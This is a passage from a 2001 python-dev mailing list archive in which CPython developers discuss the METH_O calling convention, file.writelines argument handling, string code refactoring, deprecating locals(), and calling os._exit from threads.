(8-bit and Unicode).  Too much machinery just for that.  Besides, I once
posted an example to c.l.py showing how to use regexps to search mmap'ed
files, so *that* must continue to work forever <wink>.

> b) the getreadbuf interface is complemented with a callback
>    interface, so the the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that
may need to be notified in case of change (i.e., the object would need to
maintain a list of buffers to be notified).

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called <wink>.

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
>    needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between

    b[i]
and
    b[i+1]

I expect it would be so slow even Greg wouldn't want it anymore.


From tim.one at home.com  Mon May 28 03:52:18 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c:  that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point.  Manually duplicated code blocks always get out of
synch, as people fix bugs in, or enhance, one of them but don't even know
about the others.  /F brought this up after I pissed away a few hours trying
to repair one of these in all places, and he noted that strop.replace() and
string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what?  If it were possible, is the chance that you'd take time to
rework unicodeobject.c to "subclass from a generic abstract string object"
greater than 0?  The chance that I would is exactly 0.


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 08:36:49 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS? 

METH_O will raise an exception if the function is called with more
than one argument, without calling the function. METH_OLDARGS will
pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and
an invocation with multiple arguments in a METH_OLDARGS function, is
that true?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 09:40:54 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at
METH_OLDARGS occurrences. While most of them look reasonable,
file.writelines caught my attention. It has

	if (args == NULL || !PySequence_Check(args)) {
		PyErr_SetString(PyExc_TypeError,
			   "writelines() argument must be a sequence of strings");
		return NULL;
	}

Because it is a METH_OLDARGS method, you can do

f=open("/tmp/x","w")
f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this
call illegal. Does anybody see a problem with that change in
semantics?

Regards,
Martin


From thomas at xs4all.net  Mon May 28 10:17:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

> 	if (args == NULL || !PySequence_Check(args)) {
> 		PyErr_SetString(PyExc_TypeError,
> 			   "writelines() argument must be a sequence of strings");
> 		return NULL;
> 	}

> Because it is a METH_OLDARGS method, you can do

> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")'
problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in
2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>> 

I do think we'll have to allow for this for one more release, with warnings
and all. It's extremely unlikely that anyone is using this, but changing it
without warning will definately not benifit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a
warning to 2.1.1....

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Mon May 28 11:04:51 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
> 
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c:  that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
> 
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
> 
> That's not the point.  Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others.  /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string 
operations: one set for 8-bit and one for 16-bit code. 

Looking at unicodeobject.c it seems that the section "Helpers" would
be a good start, plus perhaps a few bits from the method implementations
refactored to form a low-level string template library.

Perhaps we should move this code into
a file stringhelpers.h which then gets included by stringobject.c
and unicodeobject.c with appropriate #defines set up for
8-bit strings and for Unicode.

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
> 
> Wait for what?  If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0?  The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority;
same for the above refactoring.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 28 11:19:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
> 
> [Thomas Wouters]
> > And don't forget the method-specific errormessage by passing ':len' in
> > the format string. Of course, this can easily be (and probably should)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
> 
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets a (one or more) keyword argument.
> 
> Stick to METH_O and it's a clear win, even in this respect:  there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
> 
> if (!PyArg_ParseTuple(args, "O:abs", &v))
> if (!PyArg_ParseTuple(args, "O:callable", &v))
> if (!PyArg_ParseTuple(args, "O:id", &v))
> if (!PyArg_ParseTuple(args, "O:hash", &v))
> if (!PyArg_ParseTuple(args, "O:hex", &v))
> if (!PyArg_ParseTuple(args, "O:float", &v))
> if (!PyArg_ParseTuple(args, "O:len", &v))
> if (!PyArg_ParseTuple(args, "O:list", &v))
> else if (!PyArg_ParseTuple(args, "O:min/max", &v))
> if (!PyArg_ParseTuple(args, "O:oct", &v))
> if (!PyArg_ParseTuple(args, "O:ord", &obj))
> if (!PyArg_ParseTuple(args, "O:reload", &v))
> if (!PyArg_ParseTuple(args, "O:repr", &v))
> if (!PyArg_ParseTuple(args, "O:str", &v))
> if (!PyArg_ParseTuple(args, "O:tuple", &v))
> if (!PyArg_ParseTuple(args, "O:type", &v))
> 
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs.  The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway.  Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
> 
> >>> len(val=2)
> Yraceback (most recent call last):
>  File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
> 
> Martin's would say
> 
>     TypeError: len takes no keyword arguments
> 
> in this case.  He should add "()" after the function name.  He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases:  make the one-arg builtins fly just as
> fast as humanly possible.

If we end up only optimizing the re.match("O+") case, we wouldn't need 
the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
and Martin could call the underlying API with one or more PyObject*
taken directly from the Python VM stack.

In that case, please consider at least supporting "O", "OO" and "OOO"
with optional arguments treated like I suggested in an earlier
posting (simply pass NULL and let the API take care of assigning
a default value).

This would take care of most builtins:

Python/bltinmodule.c:
--      if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
--      if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
--      if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
--      if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
--      if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
--      if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
--      if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
--      if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
--      if (!PyArg_ParseTuple(args, "O:abs", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
--      if (!PyArg_ParseTuple(args, "O:callable", &v))
--      if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
--      if (!PyArg_ParseTuple(args, "O:id", &v))
--      if (!PyArg_ParseTuple(args, "O:hash", &v))
--      if (!PyArg_ParseTuple(args, "O:hex", &v))
--      if (!PyArg_ParseTuple(args, "O:float", &v))
--      if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
--      if (!PyArg_ParseTuple(args, "O:len", &v))
--      if (!PyArg_ParseTuple(args, "O:list", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
--      else if (!PyArg_ParseTuple(args, "O:min/max", &v))
--      if (!PyArg_ParseTuple(args, "O:oct", &v))
--      if (!PyArg_ParseTuple(args, "O:ord", &obj))
--      if (!PyArg_ParseTuple(args, "O:reload", &v))
--      if (!PyArg_ParseTuple(args, "O:repr", &v))
--      if (!PyArg_ParseTuple(args, "O:str", &v))
--      if (!PyArg_ParseTuple(args, "O:tuple", &v))
--      if (!PyArg_ParseTuple(args, "O:type", &v))

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy at digicool.com  Mon May 28 18:45:27 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now.  I'm +1 on METH_O, then.

Jeremy


From tim.one at home.com  Mon May 28 19:23:47 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEONKEAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code..


From fdrake at acm.org  Mon May 28 20:20:01 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
 > Looking at a bug report Fred forwarded, I realized that after
 > py-howto.sourceforge.net was set up, www.python.org/doc/howto was
 > never changed to redirect to the SF site instead.  As of this
 > afternoon, that's now done; links on www.python.org have been updated,
 > and I've added the redirect.
 > 
 > Question: is it worth blowing away the doc/howto/ tree now, or should
 > it just be left there, inaccessible, until work on www.python.org
 > resumes?

Andrew,
  It looks like I never replied to this.  It's probably dropped off
your radar, but I'd say the answer is that the files on parrot should
be discarded sooner rather than later -- when we actually manage to
work on python.org we're that much more likely to have forgetten the
redirection entirely!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Mon May 28 20:33:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:33:13 -0400 (EDT)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico>
References: <LNBBLJKPBEHFEDALKOLCOEMPJEAA.tim.one@home.com>
	<200103112137.QAA13084@cj20424-a.reston1.va.home.com>
	<001c01c0aa95$55836f60$325821c0@newmexico>
Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>

Guido wrote:
 > Actually, I intend to deprecate locals().  For now, globals() are
 > fine.  I also intend to deprecate vars(), at least in the form that is
 > equivalent to locals().

Samuele Pedroni writes:
 > That's fine for me. Will that deprecation be already active with 2.1, e.g
 > having locals() and param-less vars() raise a warning.
 > I imagine a (new) function that produce a snap-shot of the values in the
 > local,free and cell vars of a scope can do the job required for simple 
 > debugging (the copy will not allow to modify back the values), 
 > or another approach...

  Nothing has happened on this front yet.  Should I add deprecation
notes to the docummentation while Guido is on vacation, or wait to ask
him when he gets back?  Or was this matter resolved when I wasn't
paying attention?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one at home.com  Tue May 29 01:42:05 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 19:42:05 -0400
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPMKEAA.tim.one@home.com>

[Guido]
> Actually, I intend to deprecate locals().  For now, globals() are
> fine.  I also intend to deprecate vars(), at least in the form that is
> equivalent to locals().

[Fred L. Drake, Jr.]
>   Nothing has happened on this front yet.  Should I add deprecation
> notes to the docummentation while Guido is on vacation, or wait to ask
> him when he gets back?  Or was this matter resolved when I wasn't
> paying attention?

I advise continuing to ignore it.  Nothing was resolved, and to judge from a
trial balloon I floated on c.l.py at the time, it's not a deprecation that
will be greeted with enthusiasm.  The problems range from people doing

def f(...):
     ...
     print "..." % locals()

to people mutating locals() at module level because they simply don't
understand that globals() is the same (but correct) thing to use there.

Due to the first example, and as Samuele may <wink> have already suggested,
we at least need to implement a mapping object capturing name bindings
before we can even think about deprecating locals() for real.


From tim.one at home.com  Tue May 29 02:01:33 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:01:33 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B1214B3.9A4C295D@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPPKEAA.tim.one@home.com>

[Tim]
> Wait for what?  If it were possible, is the chance that you'd
> take time to rework unicodeobject.c to "subclass from a generic
> abstract string object" greater than 0?  The chance that I
> would is exactly 0.

[MAL]
> Well, that's hard to say. It would certainly be low-priority;
> same for the above refactoring.

I think you must have missed this when it first came up here:  /F suggested
that *he* had a non-zero chance of implementing his suggestion.  That makes
it far closer to reality than anything that's been suggested since <wink>.


From tim.one at home.com  Tue May 29 02:42:54 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:42:54 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B121814.E5E9896A@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAAKFAA.tim.one@home.com>

[MAL]
> If we end up only optimizing the re.match("O+") case, we wouldn't need
> the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
> and Martin could call the underlying API with one or more PyObject*
> taken directly from the Python VM stack.

How then does the callee know it was called with the correct # of arguments?
By adding enough pointer arguments to cover the longest possible O+ string
plus 1, then verifying that the one just beyond the last one it expects is
NULL, while the ones before that are not?  Adding another "# of arguments"
member to the method table?  Inventing METH_O, METH_OO, METH_OOO, ...?

> In that case, please consider at least supporting "O", "OO" and "OOO"
> with optional arguments treated like I suggested in an earlier
> posting (simply pass NULL and let the API take care of assigning
> a default value).
>
> This would take care of most builtins:

You don't have to convince me that cases other than plain "O" exist.  What's
missing is data in support of the idea that calls to those are relatively
frequent enough that it's a NET win to slow plain "O" in order to speed the
additional cases when they happen.  For example, it's not possible for calls
to reduce() to have a high hit rate in real life, because builtin_reduce is
a very expensive function -- there's only so many of those you can cram into
a second even if the calling overhead is 0.  OTOH, add a single branch to
the time it takes to find builtin_type and you've slowed its *total*
execution time significantly.

The implementation of METH_O alone is a pure win by any measure.  So would
be implementing METH_OO alone, or METH_OOO alone, etc.  Mix them, and they
all get slower than they could have been.  All the data we have says METH_O
is the single most important case, and that jibes with common sense, so I
believe it.

If you want to speed everything, fine, do that, but that likely requires a
preprocessing phase so that type signatures don't have to be resolved at
runtime at all.  So long as we're just looking at simple hacks, "the simpler
the better" is good advice and should rule in the absence of compelling
evidence against it.


From tim.one at home.com  Tue May 29 03:14:16 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:14:16 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEABKFAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> Because it is a METH_OLDARGS method, you can do
>
> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")
>
> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Guido won't, and if he had even a twinge of doubt, Thomas's explanation of
how this bug was introduced in 2.0 would erase it.  The list.append() docs
were arguably unclear when that brouhaha hit, but there's nothing unclear
about the file.writelines() docs.

OTOH, the file.writelines() docs still say a list is required, not "a
sequence" as the 2.0 (+ current) code actually implements.

Hmm.  Wonder whether writelines() should be generalized to allow an iterable
object?


From tim.one at home.com  Tue May 29 03:49:29 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:49:29 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>

[Aahz]
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

[TIm]
> Please open a bug report on that, then, with a tiny test case
> if possible.
> This worked fine on Win98SE for me just now:

[Aahz]
> Futz.  *Now* it works.  <sigh>

Now *what* works?  The test case I posted, or the original test case you
tried (which you didn't post)?

> Chalk it up to another unreproducible bug caused by an unstable Win98.

Actually doubt it -- threads are very reliable on Win98, despite that little
else is (malloc() is flaky, popen() is a nightmare, etc).

Here's a recent bug report on a Red Hot box that may be related:

http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735

I have no idea what's supposed to happen if you call os._exit from a
*spawned* thread (perhaps that's what you did too?  I did not) -- threads
are outside the scope of the C std, so I suppose it's a x-platform
crapshoot.


From greg at cosc.canterbury.ac.nz  Tue May 29 04:12:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:12:55 +1200 (NZST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>

> I took a special look at METH_OLDARGS occurrences.

Shouldn't all these be removed? I would have thought
list.append was the last one!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Tue May 29 04:33:58 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:33:58 +1200 (NZST)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz>

Samuele Pedroni writes:
> I imagine a (new) function that produce a snap-shot of the values in the
> local,free and cell vars of a scope can do the job required for simple 
> debugging

I think there should be methods operating directly
on stack frames for debuggers to use.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From jepler at mail.inetnebr.com  Tue May 29 04:32:05 2001
From: jepler at mail.inetnebr.com (Jeff Epler)
Date: Mon, 28 May 2001 21:32:05 -0500
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400
References: <20010524045938.5228199C83@waltz.rahul.net> <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>
Message-ID: <20010528213205.A1236@localhost.localdomain>

On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote:
> Here's a recent bug report on a Red Hot box that may be related:
> 
> http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
> 
> I have no idea what's supposed to happen if you call os._exit from a
> *spawned* thread (perhaps that's what you did too?  I did not) -- threads
> are outside the scope of the C std, so I suppose it's a x-platform
> crapshoot.

I wrote that program after the first go-round about _exit and threads,
and when I got behavior I didn't expect, I entered it in the SF bug
tracker.

My reasoning: The documentation for _exit() says it is "used to exit the
child process after a fork()", and my model for thinking about threads
is that they're "child processes, but ...".  Thus, invoking os._exit()
in a thread made sense to me, meaning "ask the OS to destroy this thread
now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a
good one, though my suspicion (which I did not voice in the SF report)
was that perhaps the thread which called _exit() held the GIL, in which
case it was in some sense Python's fault that execution didn't continue.
In any case, I don't have the faintest idea how to program threads in
C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0  0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5  0x40019ef9 in floatsleep () at eval.c:41
#6  0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all three
frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then
this behavior is as good as any.  <wink>

Jeff


From tim.one at home.com  Tue May 29 06:03:38 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKFAA.tim.one@home.com>

[Jeff Epler, on
 http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...".  Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this.  Threads and processes are
different beasts under most flavors of Unix, but Linux confuses them; I've
no idea how _exit() is supposed to work there, and that's why I asked (in
the bug report) what the Linux docs say about that (_exit() is supplied by
your local C library; Python just wraps it).

If what you really wanted was just to abort the thread, use thread.exit()
(aee the thread docs).  os._exit() is a dangerous thing even in the best of
conditions; unsure why the Python docs suggest using it.

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense!  Yes, I bet that's what's happening.  If so, there's
nothing Python can do about it:  I'm afraid you did it to yourself.  _exit()
specifically asks that no cleanup processing be done, and when Python calls
it Python never regains control.  If you had done an actual fork, fine, the
*process* doing the _exit() would never come back to Python, but the GIL in
that process has nothing to do with the GIL in the parent process.  But
threads share the same GIL, and if you _exit() from a thread holding the GIL
then no other thread can ever run again.

Looks like it's also platform-dependent:  on Windows, _exit() kills the
process and every thread ever spawned by that process.  Since C doesn't say
anything about threads, that can't be called right or wrong.  Looks like on
Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it wasn't -- unless your program panics and wants to get out ASAP no
matter what the consequences.

> then this behavior is as good as any.  <wink>

And better than most <heh>.


From tim.one at home.com  Tue May 29 06:16:46 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions.
METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can
distinguish between "called with nothing" and "called with something" under
OLDARGS.  However, they don't appear to catch keyword args:

>>> {}.clear(2)  # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666)  # accepts nonsense silently
>>>

the-more-you-look-the-messier-it-gets-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:06:19 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEAMKFAA.tim.one@home.com>

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A. Warsaw]
> here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,

That's what Einstein believed (i.e., that it isn't truly random).
Unfortunately, according to another recent thread, Einstein was afraid to
use equations because he didn't want to cut Stephen Hawking's editor's penis
in half -- or something like that.  Whichever, consensus still holds that
Einstein lost this one.

i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace-
    crying-for-help-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:15:07 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:15:07 -0400
Subject: [Python-Dev] RE: What happened to Idle's extend.py?
In-Reply-To: <f9b3eae9.0105231419.7d093237@posting.google.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEANKFAA.tim.one@home.com>

Guido's on vacation.  Anyone have an answer for this?  I don't, and can't
make time to dig into now.

If you can, David's address showed up as mailto:boogiemorg at aol.com

> -----Original Message-----
> From: python-list-admin at python.org
> [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler
> Sent: Wednesday, May 23, 2001 6:20 PM
> To: python-list at python.org
> Subject: What happened to Idle's extend.py?
>
>
> Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was
> used to extend Idle. We've used this extensively, building entire
> "applications" as Idle extensions.
>
> Now that we're moving to Python 2.1, we find the same old directions
